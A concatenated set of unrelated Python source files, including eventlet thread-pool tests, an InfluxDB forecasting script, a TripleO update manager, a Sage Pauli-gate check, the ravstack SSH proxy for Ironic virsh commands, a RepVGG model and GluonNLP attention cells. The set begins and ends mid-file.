def wrapped(arg):
return arg
x = tpool.Proxy(wrapped)
self.assertEqual(4, x(4))
# verify that it wraps return values if specified
x = tpool.Proxy(wrapped, autowrap_names=('__call__',))
assert isinstance(x(4), tpool.Proxy)
self.assertEqual("4", str(x(4)))
@tests.skip_with_pyevent
def test_callable_iterator(self):
def wrapped(arg):
yield arg
yield arg
yield arg
x = tpool.Proxy(wrapped, autowrap_names=('__call__',))
for r in x(3):
self.assertEqual(3, r)
@tests.skip_with_pyevent
def test_eventlet_timeout(self):
def raise_timeout():
raise eventlet.Timeout()
self.assertRaises(eventlet.Timeout, tpool.execute, raise_timeout)
@tests.skip_with_pyevent
def test_tpool_set_num_threads(self):
tpool.set_num_threads(5)
self.assertEqual(5, tpool._nthreads)
class TpoolLongTests(tests.LimitedTestCase):
TEST_TIMEOUT = 60
@tests.skip_with_pyevent
def test_a_buncha_stuff(self):
assert_ = self.assert_
class Dummy(object):
def foo(self, when, token=None):
assert_(token is not None)
time.sleep(random.random() / 200.0)
return token
def sender_loop(loopnum):
obj = tpool.Proxy(Dummy())
count = 100
for n in six.moves.range(count):
eventlet.sleep(random.random() / 200.0)
now = time.time()
token = loopnum * count + n
rv = obj.foo(now, token=token)
self.assertEqual(token, rv)
eventlet.sleep(random.random() / 200.0)
cnt = 10
pile = eventlet.GreenPile(cnt)
for i in six.moves.range(cnt):
pile.spawn(sender_loop, i)
results = list(pile)
self.assertEqual(len(results), cnt)
tpool.killall()
@tests.skip_with_pyevent
def test_leakage_from_tracebacks(self):
tpool.execute(noop) # get it started
gc.collect()
initial_objs = len(gc.get_objects())
for i in range(10):
self.assertRaises(RuntimeError, tpool.execute, raise_exception)
gc.collect()
middle_objs = len(gc.get_objects())
# some objects will inevitably be created by the previous loop
# now we test to ensure that running the loop an order of
# magnitude more doesn't generate additional objects
for i in six.moves.range(100):
self.assertRaises(RuntimeError, tpool.execute, raise_exception)
first_created = middle_objs - initial_objs
gc.collect()
second_created = len(gc.get_objects()) - middle_objs
self.assert_(second_created - first_created < 10,
"first loop: %s, second loop: %s" % (first_created,
second_created))
tpool.killall()
def test_isolate_from_socket_default_timeout():
tests.run_isolated('tpool_isolate_socket_default_timeout.py', timeout=5)
def test_exception_leak():
tests.run_isolated('tpool_exception_leak.py')
|
the-stack_0_25253
|
import json
import logging
import os
import sys
import shutil
import argparse
import numpy as np
import pandas as pd
import urllib3
from influxdb import InfluxDBClient
dir_path = os.path.dirname(os.path.realpath(__file__))
path_parent = os.path.dirname(dir_path)
sys.path.insert(0, path_parent)
from classes.artificial_features import ArtificialFeatures
from classes.features_analyzer import FeaturesAnalyzer
from classes.inputs_gatherer import InputsGatherer
from classes.grid_searcher import GridSearcher
from classes.model_trainer import ModelTrainer
urllib3.disable_warnings()
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-t", help="type (MOR | EVE)")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
# Load the main parameters
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
# Load the connections parameters and update the config dict with the related values
cfg_conns = json.loads(open(cfg['connectionsFile']).read())
cfg.update(cfg_conns)
# Define the forecast type
forecast_type = args.t
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
logger.info('Starting program')
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
# --------------------------------------------------------------------------- #
# Functions
# --------------------------------------------------------------------------- #
# --------------------------------------------------------------------------- #
# Test using regions
# --------------------------------------------------------------------------- #
AF = ArtificialFeatures(influx_client, forecast_type, cfg, logger)
IG = InputsGatherer(influx_client, forecast_type, cfg, logger, AF)
FA = FeaturesAnalyzer(IG, forecast_type, cfg, logger)
MT = ModelTrainer(FA, IG, forecast_type, cfg, logger)
GS = GridSearcher(FA, IG, MT, forecast_type, cfg, logger)
cfg['datasetSettings']['startDay'] = '07-10'
cfg['datasetSettings']['endDay'] = '07-20'
cfg['datasetSettings']['years'] = [2019]
cfg['datasetSettings']['datasetCreator'] = 'regions'
cfg['featuresAnalyzer']['performFeatureSelection'] = True
cfg['featuresAnalyzer']['numberSelectedFeatures'] = 10
# FA.dataset_creator()
FA.dataset_reader()
MT.train_final_models()
for region in cfg['regions']:
folder_path = IG.output_folder_creator(region)
os.remove(cfg['datasetSettings']['outputSignalFolder'] + region + '_signals.json')
try:
shutil.rmtree(folder_path)
except OSError as e:
logger.error("%s - %s." % (e.filename, e.strerror))
logger.info('Ending program')
|
the-stack_0_25254
|
# Copyright 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import time
from heatclient.common import template_utils
from tripleo_common import _stack_update
from tripleo_common import constants
LOG = logging.getLogger(__name__)
def add_breakpoints_cleanup_into_env(env):
template_utils.deep_update(env, {
'resource_registry': {
'resources': {'*': {'*': {
constants.UPDATE_RESOURCE_NAME: {'hooks': []}}}}
}
})
class PackageUpdateManager(_stack_update.StackUpdateManager):
def __init__(self, heatclient, novaclient, stack_id, stack_fields):
stack = heatclient.stacks.get(stack_id)
self.stack_fields = stack_fields
super(PackageUpdateManager, self).__init__(
heatclient=heatclient, novaclient=novaclient, stack=stack,
hook_type='pre-update', nested_depth=5,
hook_resource=constants.UPDATE_RESOURCE_NAME)
def update(self, timeout_mins=constants.STACK_TIMEOUT_DEFAULT):
env = {}
if 'environment' in self.stack_fields:
env = self.stack_fields['environment']
template_utils.deep_update(env, {
'resource_registry': {
'resources': {
'*': {
'*': {
constants.UPDATE_RESOURCE_NAME: {
'hooks': 'pre-update'}
}
}
}
}
})
# time rounded to seconds
timestamp = int(time.time())
stack_params = {
'DeployIdentifier': timestamp,
'UpdateIdentifier': timestamp,
'StackAction': 'UPDATE'
}
template_utils.deep_update(env, {'parameter_defaults': stack_params})
self.stack_fields['environment'] = env
fields = {
'existing': True,
'stack_id': self.stack.id,
'template': self.stack_fields['template'],
'files': self.stack_fields['files'],
'environment': self.stack_fields['environment'],
'timeout_mins': timeout_mins,
'stack_name': self.stack_fields['stack_name'],
}
LOG.info('updating stack: %s', self.stack.stack_name)
LOG.debug('stack update params: %s', fields)
self.heatclient.stacks.update(**fields)
|
the-stack_0_25256
|
from sage.all import *
from gates import *
def hash_Pauli3(p):
hash = 0
k = 0
for row in p:
for element in row:
hash += (2 ** k) * element
k += 1
return hash
if __name__ == "__main__":
CX01 = generate_CnX_gate(3, {2-0}, {2-1})
CX02 = generate_CnX_gate(3, {2-0}, {2-2})
CX12 = generate_CnX_gate(3, {2-1}, {2-2})
seen = {}
P3 = []
for A, a in zip([I, X, Y, Z], ["I", "X", "Y", "Z"]):
for B, b in zip([I, X, Y, Z], ["I", "X", "Y", "Z"]):
for C, c in zip([I, X, Y, Z], ["I", "X", "Y", "Z"]):
t = tensor3(A, B, C)
assert(not (hash_Pauli3 in seen))
seen[ 1 * hash_Pauli3(t)] = f" ({a} x {b} x {c})"
seen[-1 * hash_Pauli3(t)] = f" -({a} x {b} x {c})"
seen[ i * hash_Pauli3(t)] = f" i({a} x {b} x {c})"
seen[-i * hash_Pauli3(t)] = f"-i({a} x {b} x {c})"
P3.append(t)
#print(t)
#print(hash_Pauli3(t))
print(len(seen))
d_CCZ = CCZ.conjugate_transpose()
n = 0
for p in P3:
for p_prime in P3:
u = CCZ * p * d_CCZ
t = u * p_prime * u.conjugate_transpose()
h = hash_Pauli3(t)
assert(h in seen)
|
the-stack_0_25259
|
#
# This file is part of ravstack. Ravstack is free software available under
# the terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2015 the ravstack authors. See the file "AUTHORS" for a
# complete list.
from __future__ import absolute_import, print_function
import os
import shlex
import subprocess
import textwrap
import re
from . import util, factory, node, runtime
from .runtime import LOG, CONF
# proxy-create command
def create_ssh_keypair(keyname, comment):
"""Create a new ssh keypair."""
sshdir = os.path.join(util.get_homedir(), '.ssh')
util.create_directory(sshdir, 0o700)
keyfile = os.path.join(sshdir, keyname)
if util.try_stat(keyfile):
raise RuntimeError('~/.ssh/{} already exists'.format(keyname))
subprocess.check_call(['ssh-keygen', '-f', keyfile, '-N', "", '-q', '-C', comment])
os.chmod(keyfile, 0o600)
os.chmod(keyfile + '.pub', 0o644)
return keyfile
def create_proxy(proxyname):
"""Create a proxy wrapper."""
# Running in a software collection?
enable_scls = []
scls = os.environ.get('X_SCLS', '')
for scl in scls.split():
with open('/etc/scl/conf/{}'.format(scl)) as fin:
prefix = fin.readline().rstrip()
enable_scls.append('. {}/{}/enable'.format(prefix, scl))
if scls:
enable_scls.append('X_SCLS={}'.format(shlex.quote(scls)))
enable_scls.append('export X_SCLS')
else:
enable_scls.append('# No software collections enabled.')
enable_scls = '\n'.join(enable_scls)
# Running in a virtualenv?
venv = os.environ.get('VIRTUAL_ENV')
enable_venv = '. {}/bin/activate'.format(venv) if venv else '# No virtualenv enabled.'
# Create the ~/bin directory if needed
bindir = os.path.join(util.get_homedir(), 'bin')
proxyfile = os.path.join(bindir, proxyname)
util.create_directory(bindir, 0o755)
contents = textwrap.dedent("""\
#!/bin/sh
{}
{}
exec python -mravstack.proxy
""").format(enable_scls, enable_venv)
with open(proxyfile, 'w') as fout:
fout.write(contents)
os.chmod(proxyfile, 0o700)
return proxyfile
def install_proxy(pubkey, command):
"""Add a public key to the authorized_keys file."""
with open(pubkey) as fin:
keydata = fin.read()
sshdir = os.path.join(util.get_homedir(), '.ssh')
authentry = 'no-pty,no-port-forwarding,no-X11-forwarding,no-agent-forwarding'
authentry += ',command="{}",from="127.0.0.1,::1" '.format(command)
authentry += keydata
authfile = os.path.join(sshdir, 'authorized_keys')
with open(authfile, 'a') as fout:
fout.write(authentry)
os.chmod(authfile, 0o600)
def test_proxy(keyfile):
"""Test the proxy."""
# This also has the benefit that the host key is added to the known hosts file.
subprocess.check_call(['ssh', '-q', '-o', 'StrictHostKeyChecking=no', '-i', keyfile,
'localhost', 'true'])
def do_create(env):
"""The `ravstack proxy-create` command."""
keyname = env.config['proxy']['key_name']
proxyname = env.config['proxy']['proxy_name']
keyfile = create_ssh_keypair(keyname, proxyname)
proxyfile = create_proxy(proxyname)
install_proxy(keyfile + '.pub', proxyfile)
test_proxy(keyfile)
print('Private key created as: `~/.ssh/{}`.'.format(keyname))
print('Proxy created at: `~/bin/{}`.'.format(proxyname))
# proxy-run command
# These are the virsh commands used by the ssh power driver in Ironic.
# They need to match and be kept up to date with the following file:
# https://github.com/openstack/ironic/blob/master/ironic/drivers/modules/ssh.py#L151
_virsh_commands = [
('true', re.compile('^true$')),
('start', re.compile(' start ([^ ]+)')),
('stop', re.compile(' destroy ([^ ]+)')),
('reboot', re.compile(' reset ([^ ]+)')),
('get_node_macs', re.compile(' dumpxml ([^ ]+) .*mac')),
('list_running', re.compile(' list --all.*running')),
('list_all', re.compile(' list --all')),
('get_boot_device', re.compile(' dumpxml ([^ ]+) .*boot')),
('set_boot_device', re.compile(r'boot dev=\\"([^\\]+)\\".* edit ([^ ]+)')),
]
def parse_virsh_command_line(command):
"""Parse the virsh command line.
The proxy script is run as a forced command specified in an ssh private
key. The original command is available in the $SSH_ORIGINAL_COMMAND
environment variable.
"""
for cmd, regex in _virsh_commands:
match = regex.search(command)
if match:
return (cmd,) + match.groups()
raise RuntimeError('unrecognized command: {}'.format(command))
def main():
"""Proxy main function."""
args = {'--cached': True}
CONF.update_from_args(args)
# Make sure we are running under SSH.
conn = os.environ.get('SSH_CONNECTION', '?:?')
if conn is None:
raise RuntimeError('This command needs to be run through ssh.')
# Add connection info the the logs.
cp = conn.split()
context = '{}:{}'.format('' if cp[0] in ('127.0.0.1', '::1') else cp[0], cp[1])
runtime.setup_logging(context)
# Parse the original command to understand what we need to do.
command = os.environ.get('SSH_ORIGINAL_COMMAND')
LOG.debug('New request, command = {}'.format(command))
cmdline = parse_virsh_command_line(command)
LOG.info('Parsed command: {}'.format(' '.join(cmdline)))
env = factory.get_environ(args)
if cmdline[0] == 'true':
pass
elif cmdline[0] == 'start':
node.do_start(env, cmdline[1])
elif cmdline[0] == 'stop':
node.do_stop(env, cmdline[1])
elif cmdline[0] == 'reboot':
node.do_reboot(env, cmdline[1])
elif cmdline[0] == 'list_running':
node.do_list_running(env, True)
elif cmdline[0] == 'list_all':
node.do_list_all(env)
elif cmdline[0] == 'get_boot_device':
node.do_get_boot_device(env, cmdline[1])
elif cmdline[0] == 'set_boot_device':
node.do_set_boot_device(env, cmdline[2], cmdline[1])
elif cmdline[0] == 'get_node_macs':
node.do_get_macs(env, cmdline[1], True)
if __name__ == '__main__':
runtime.run_main(main)
|
the-stack_0_25260
|
'''
RepVGG: Making VGG-style ConvNets Great Again
https://arxiv.org/pdf/2101.03697.pdf
'''
import numpy as np
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = [
'RepVGG_A0',
'RepVGG_A1',
'RepVGG_A2',
'RepVGG_B0',
'RepVGG_B1',
'RepVGG_B1g2',
'RepVGG_B1g4',
'RepVGG_B2',
'RepVGG_B2g2',
'RepVGG_B2g4',
'RepVGG_B3',
'RepVGG_B3g2',
'RepVGG_B3g4',
]
groupwise_layers = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26]
g2_map = {l: 2 for l in groupwise_layers}
g4_map = {l: 4 for l in groupwise_layers}
types_config = {
'RepVGG_A0': {
'num_blocks': [2, 4, 14, 1],
'width_multiplier': [0.75, 0.75, 0.75, 2.5],
'override_groups_map': None,
},
'RepVGG_A1': {
'num_blocks': [2, 4, 14, 1],
'width_multiplier': [1, 1, 1, 2.5],
'override_groups_map': None,
},
'RepVGG_A2': {
'num_blocks': [2, 4, 14, 1],
'width_multiplier': [1.5, 1.5, 1.5, 2.75],
'override_groups_map': None,
},
'RepVGG_B0': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [1, 1, 1, 2.5],
'override_groups_map': None,
},
'RepVGG_B1': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2, 2, 2, 4],
'override_groups_map': None,
},
'RepVGG_B1g2': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2, 2, 2, 4],
'override_groups_map': g2_map,
},
'RepVGG_B1g4': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2, 2, 2, 4],
'override_groups_map': g4_map,
},
'RepVGG_B2': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2.5, 2.5, 2.5, 5],
'override_groups_map': None,
},
'RepVGG_B2g2': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2.5, 2.5, 2.5, 5],
'override_groups_map': g2_map,
},
'RepVGG_B2g4': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [2.5, 2.5, 2.5, 5],
'override_groups_map': g4_map,
},
'RepVGG_B3': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [3, 3, 3, 5],
'override_groups_map': None,
},
'RepVGG_B3g2': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [3, 3, 3, 5],
'override_groups_map': g2_map,
},
'RepVGG_B3g4': {
'num_blocks': [4, 6, 16, 1],
'width_multiplier': [3, 3, 3, 5],
'override_groups_map': g4_map,
},
}
def conv_bn_layer(inplanes, planes, kernel_size, stride, padding=1, groups=1):
layer = nn.Sequential(
OrderedDict([
('conv',
nn.Conv2d(inplanes,
planes,
kernel_size,
stride=stride,
padding=padding,
groups=groups,
bias=False)),
('bn', nn.BatchNorm2d(planes)),
]))
return layer
class RepVGGBlock(nn.Module):
def __init__(self,
inplanes,
planes,
kernel_size=3,
stride=1,
padding=1,
groups=1,
deploy=False):
super(RepVGGBlock, self).__init__()
self.inplanes = inplanes
self.groups = groups
self.deploy = deploy
assert kernel_size == 3 and padding == 1
if self.deploy:
self.fuse_equivalent_conv = nn.Conv2d(inplanes,
planes,
kernel_size,
stride=stride,
padding=padding,
groups=groups,
bias=True)
else:
self.identity = nn.BatchNorm2d(
inplanes) if inplanes == planes and stride == 1 else None
self.conv3x3 = conv_bn_layer(inplanes,
planes,
kernel_size=kernel_size,
stride=stride,
padding=padding,
groups=groups)
self.conv1x1 = conv_bn_layer(inplanes,
planes,
kernel_size=1,
stride=stride,
padding=padding - kernel_size // 2,
groups=groups)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
if self.deploy:
x = self.relu(self.fuse_equivalent_conv(x))
return x
if self.identity:
identity_out = self.identity(x)
else:
identity_out = 0
x = self.relu(self.conv3x3(x) + self.conv1x1(x) + identity_out)
return x
def _fuse_bn_layer(self, branch):
'''
fuse conv and bn layers to get equivalent conv layer kernel and bias
'''
if branch is None:
return 0, 0
if isinstance(branch, nn.Sequential):
# make sure conv layer doesn't have bias
kernel = branch.conv.weight
running_mean, running_var = branch.bn.running_mean, branch.bn.running_var
gamma, beta, eps = branch.bn.weight, branch.bn.bias, branch.bn.eps
else:
assert isinstance(branch, nn.BatchNorm2d)
# convert identity branch to get a equivalent 1x1 conv layer kernel and bias
input_dim = self.inplanes // self.groups
kernel_value = np.zeros((self.inplanes, input_dim, 3, 3),
dtype=np.float32)
for i in range(self.inplanes):
kernel_value[i, i % input_dim, 1, 1] = 1
kernel = torch.from_numpy(kernel_value).to(branch.weight.device)
running_mean, running_var = branch.running_mean, branch.running_var
gamma, beta, eps = branch.weight, branch.bias, branch.eps
# fuse conv and bn layer
std = (running_var + eps).sqrt()
t = (gamma / std).reshape(-1, 1, 1, 1)
equivalent_kernel, equivalent_bias = kernel * t, beta - running_mean * gamma / std
return equivalent_kernel, equivalent_bias
def get_equivalent_conv_kernel_bias(self):
kernel3x3, bias3x3 = self._fuse_bn_layer(self.conv3x3)
kernel1x1, bias1x1 = self._fuse_bn_layer(self.conv1x1)
kernelidentity, biasidentity = self._fuse_bn_layer(self.identity)
# 1x1kernel must be pad to 3x3kernel before add
kernel, bias = kernel3x3 + F.pad(
kernel1x1,
[1, 1, 1, 1]) + kernelidentity, bias3x3 + bias1x1 + biasidentity
kernel, bias = kernel.detach().cpu(), bias.detach().cpu()
return kernel, bias
class RepVGG(nn.Module):
def __init__(self, repvgg_type, deploy=False, num_classes=1000):
super(RepVGG, self).__init__()
self.superparams = types_config[repvgg_type]
self.num_blocks = self.superparams['num_blocks']
self.width_multiplier = self.superparams['width_multiplier']
self.override_groups_map = self.superparams[
'override_groups_map'] if self.superparams[
'override_groups_map'] else dict()
self.deploy = deploy
self.num_classes = num_classes
self.inplanes = min(64, int(64 * self.width_multiplier[0]))
self.cur_layer_idx = 1
self.stage0 = RepVGGBlock(3,
self.inplanes,
kernel_size=3,
stride=2,
padding=1,
groups=1,
deploy=self.deploy)
self.stage1 = self._make_stage(int(64 * self.width_multiplier[0]),
self.num_blocks[0],
stride=2)
self.stage2 = self._make_stage(int(128 * self.width_multiplier[1]),
self.num_blocks[1],
stride=2)
self.stage3 = self._make_stage(int(256 * self.width_multiplier[2]),
self.num_blocks[2],
stride=2)
self.stage4 = self._make_stage(int(512 * self.width_multiplier[3]),
self.num_blocks[3],
stride=2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(int(512 * self.width_multiplier[3]),
self.num_classes)
def _make_stage(self, planes, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
blocks = []
for stride in strides:
cur_groups = self.override_groups_map.get(self.cur_layer_idx, 1)
blocks.append(
RepVGGBlock(self.inplanes,
planes,
kernel_size=3,
stride=stride,
padding=1,
groups=cur_groups,
deploy=self.deploy))
self.inplanes = planes
self.cur_layer_idx += 1
return nn.Sequential(*blocks)
def forward(self, x):
x = self.stage0(x)
x = self.stage1(x)
x = self.stage2(x)
x = self.stage3(x)
x = self.stage4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def _repvgg(arch, deploy, **kwargs):
model = RepVGG(arch, deploy, **kwargs)
return model
def RepVGG_A0(deploy=False, **kwargs):
return _repvgg('RepVGG_A0', deploy, **kwargs)
def RepVGG_A1(deploy=False, **kwargs):
return _repvgg('RepVGG_A1', deploy, **kwargs)
def RepVGG_A2(deploy=False, **kwargs):
return _repvgg('RepVGG_A2', deploy, **kwargs)
def RepVGG_B0(deploy=False, **kwargs):
return _repvgg('RepVGG_B0', deploy, **kwargs)
def RepVGG_B1(deploy=False, **kwargs):
return _repvgg('RepVGG_B1', deploy, **kwargs)
def RepVGG_B1g2(deploy=False, **kwargs):
return _repvgg('RepVGG_B1g2', deploy, **kwargs)
def RepVGG_B1g4(deploy=False, **kwargs):
return _repvgg('RepVGG_B1g4', deploy, **kwargs)
def RepVGG_B2(deploy=False, **kwargs):
return _repvgg('RepVGG_B2', deploy, **kwargs)
def RepVGG_B2g2(deploy=False, **kwargs):
return _repvgg('RepVGG_B2g2', deploy, **kwargs)
def RepVGG_B2g4(deploy=False, **kwargs):
return _repvgg('RepVGG_B2g4', deploy, **kwargs)
def RepVGG_B3(deploy=False, **kwargs):
return _repvgg('RepVGG_B3', deploy, **kwargs)
def RepVGG_B3g2(deploy=False, **kwargs):
return _repvgg('RepVGG_B3g2', deploy, **kwargs)
def RepVGG_B3g4(deploy=False, **kwargs):
return _repvgg('RepVGG_B3g4', deploy, **kwargs)
def deploy_model(trained_model, deployed_model):
deploy_model_weights = {}
for name, module in trained_model.named_modules():
if hasattr(module, 'get_equivalent_conv_kernel_bias'):
kernel, bias = module.get_equivalent_conv_kernel_bias()
deploy_model_weights[name +
'.fuse_equivalent_conv.weight'] = kernel
deploy_model_weights[name + '.fuse_equivalent_conv.bias'] = bias
elif isinstance(module, nn.Linear):
deploy_model_weights[name +
'.weight'] = module.weight.detach().cpu()
deploy_model_weights[name + '.bias'] = module.bias.detach().cpu()
else:
# named_parameters return all layers that need to be backpropagated,such as conv layer or linear layer
for layer_name, layer_weights in module.named_parameters():
full_name = name + '.' + layer_name
if full_name not in deploy_model_weights.keys():
deploy_model_weights[full_name] = layer_weights.detach(
).cpu()
# named_buffers return all layers that don't need to be backpropagated,such as bn layer
for layer_name, layer_weights in module.named_buffers():
full_name = name + '.' + layer_name
if full_name not in deploy_model_weights.keys():
deploy_model_weights[full_name] = layer_weights.cpu()
# load all equivalent weights,and the other weights will be abandoned(self.conv3x3,self.conv1x1,self.identity in RepVGGBlock).
deployed_model.load_state_dict(deploy_model_weights, strict=False)
return deployed_model
if __name__ == '__main__':
import os
import random
import numpy as np
import torch
seed = 0
# for hash
os.environ['PYTHONHASHSEED'] = str(seed)
# for python and numpy
random.seed(seed)
np.random.seed(seed)
# for cpu gpu
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
net = RepVGG_A0(deploy=False, num_classes=1000)
image_h, image_w = 224, 224
from thop import profile
from thop import clever_format
macs, params = profile(net,
inputs=(torch.randn(1, 3, image_h, image_w), ),
verbose=False)
macs, params = clever_format([macs, params], '%.3f')
out = net(torch.autograd.Variable(torch.randn(3, 3, image_h, image_w)))
print(f'1111, macs: {macs}, params: {params},out_shape: {out.shape}')
# an example to deploy repvgg trained model
trained_model = RepVGG_A0(deploy=False)
# # Assuming that the model has been trained, save the model
# torch.save(trained_model.state_dict(), 'RepVGG_A0_trained.pth')
# # load trained parameters
# trained_model.load_state_dict(
# torch.load('RepVGG_A0_trained.pth', map_location=torch.device('cpu')))
trained_model.eval()
# define deployed model
deployed_model = RepVGG_A0(deploy=True)
deployed_model = deploy_model(trained_model, deployed_model)
# torch.save(deployed_model.state_dict(), 'RepVGG_A0_deployed.pth')
deployed_model.eval()
inputs = torch.randn(3, 3, 224, 224)
out1 = trained_model(inputs)
out2 = deployed_model(inputs)
print(out1[0][1:20], out2[0][1:20])
print(((out1 - out2)**2).sum()) # Will be around 1e-10
|
the-stack_0_25264
|
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Attention cells."""
from __future__ import absolute_import
from __future__ import print_function
__all__ = ['AttentionCell', 'MultiHeadAttentionCell', 'MLPAttentionCell', 'DotProductAttentionCell']
import math
import mxnet as mx
from mxnet.gluon.block import HybridBlock
from mxnet.gluon import nn
from .block import L2Normalization
# TODO(sxjscience) Add mask flag to softmax operator. Think about how to accelerate the kernel
def _masked_softmax(F, att_score, mask):
"""Ignore the masked elements when calculating the softmax
Parameters
----------
F : symbol or ndarray
att_score : Symborl or NDArray
Shape (batch_size, query_length, memory_length)
mask : Symbol or NDArray or None
Shape (batch_size, query_length, memory_length)
Returns
-------
att_weights : Symborl or NDArray
Shape (batch_size, query_length, memory_length)
"""
if mask is not None:
# Fill in the masked scores with a very small value
att_score = F.where(mask, att_score, -1e18 * F.ones_like(att_score))
att_weights = F.softmax(att_score, axis=-1) * mask
else:
att_weights = F.softmax(att_score, axis=-1)
return att_weights
# TODO(sxjscience) In the future, we should support setting mask/att_weights as sparse tensors
class AttentionCell(HybridBlock):
"""Abstract class for attention cells. Extend the class
to implement your own attention method.
One typical usage is to define your own `_compute_weight()` function to calculate the weights::
cell = AttentionCell()
out = cell(query, key, value, mask)
"""
def _compute_weight(self, F, query, key, mask=None):
"""Compute attention weights based on the query and the keys
Parameters
----------
F : symbol or ndarray
query : Symbol or NDArray
The query vectors. Shape (batch_size, query_length, query_dim)
key : Symbol or NDArray
Key of the memory. Shape (batch_size, memory_length, key_dim)
mask : Symbol or NDArray or None
Mask the memory slots. Shape (batch_size, query_length, memory_length)
Only contains 0 or 1 where 0 means that the memory slot will not be used.
If set to None. No mask will be used.
Returns
-------
att_weights : Symbol or NDArray
For single-head attention, Shape (batch_size, query_length, memory_length)
For multi-head attention, Shape (batch_size, num_heads, query_length, memory_length)
"""
raise NotImplementedError
def _read_by_weight(self, F, att_weights, value):
"""Read from the value matrix given the attention weights.
Parameters
----------
F : symbol or ndarray
att_weights : Symbol or NDArray
Attention weights.
For single-head attention,
Shape (batch_size, query_length, memory_length).
For multi-head attention,
Shape (batch_size, num_heads, query_length, memory_length).
value : Symbol or NDArray
Value of the memory. Shape (batch_size, memory_length, total_value_dim)
Returns
-------
context_vec: Symbol or NDArray
Shape (batch_size, query_length, context_vec_dim)
"""
return F.batch_dot(att_weights, value)
def __call__(self, query, key, value=None, mask=None): # pylint: disable=arguments-differ
"""Compute the attention.
Parameters
----------
query : Symbol or NDArray
Query vector. Shape (batch_size, query_length, query_dim)
key : Symbol or NDArray
Key of the memory. Shape (batch_size, memory_length, key_dim)
value : Symbol or NDArray or None, default None
Value of the memory. If set to None, the value will be set as the key.
Shape (batch_size, memory_length, value_dim)
mask : Symbol or NDArray or None, default None
Mask of the memory slots. Shape (batch_size, query_length, memory_length)
Only contains 0 or 1 where 0 means that the memory slot will not be used.
If set to None. No mask will be used.
Returns
-------
context_vec : Symbol or NDArray
Shape (batch_size, query_length, context_vec_dim)
att_weights : Symbol or NDArray
Attention weights. Shape (batch_size, query_length, memory_length)
"""
return super(AttentionCell, self).__call__(query, key, value, mask)
def forward(self, query, key, value=None, mask=None): # pylint: disable=arguments-differ
if value is None:
value = key
if mask is None:
return super(AttentionCell, self).forward(query, key, value)
else:
return super(AttentionCell, self).forward(query, key, value, mask)
def hybrid_forward(self, F, query, key, value, mask=None): # pylint: disable=arguments-differ
att_weights = self._compute_weight(F, query, key, mask)
context_vec = self._read_by_weight(F, att_weights, value)
return context_vec, att_weights
class MultiHeadAttentionCell(AttentionCell):
r"""Multi-head Attention Cell.
In the MultiHeadAttentionCell, the input query/key/value will be linearly projected
for `num_heads` times with different projection matrices. Each projected key, value, query
will be used to calculate the attention weights and values. The output of each head will be
concatenated to form the final output.
The idea is first proposed in "[Arxiv2014] Neural Turing Machines" and
is later adopted in "[NIPS2017] Attention is All You Need" to solve the
Neural Machine Translation problem.
Parameters
----------
base_cell : AttentionCell
query_units : int
Total number of projected units for query. Must be divided exactly by num_heads.
key_units : int
Total number of projected units for key. Must be divided exactly by num_heads.
value_units : int
Total number of projected units for value. Must be divided exactly by num_heads.
num_heads : int
Number of parallel attention heads
use_bias : bool, default True
Whether to use bias when projecting the query/key/values
weight_initializer : str or `Initializer` or None, default None
Initializer of the weights.
bias_initializer : str or `Initializer`, default 'zeros'
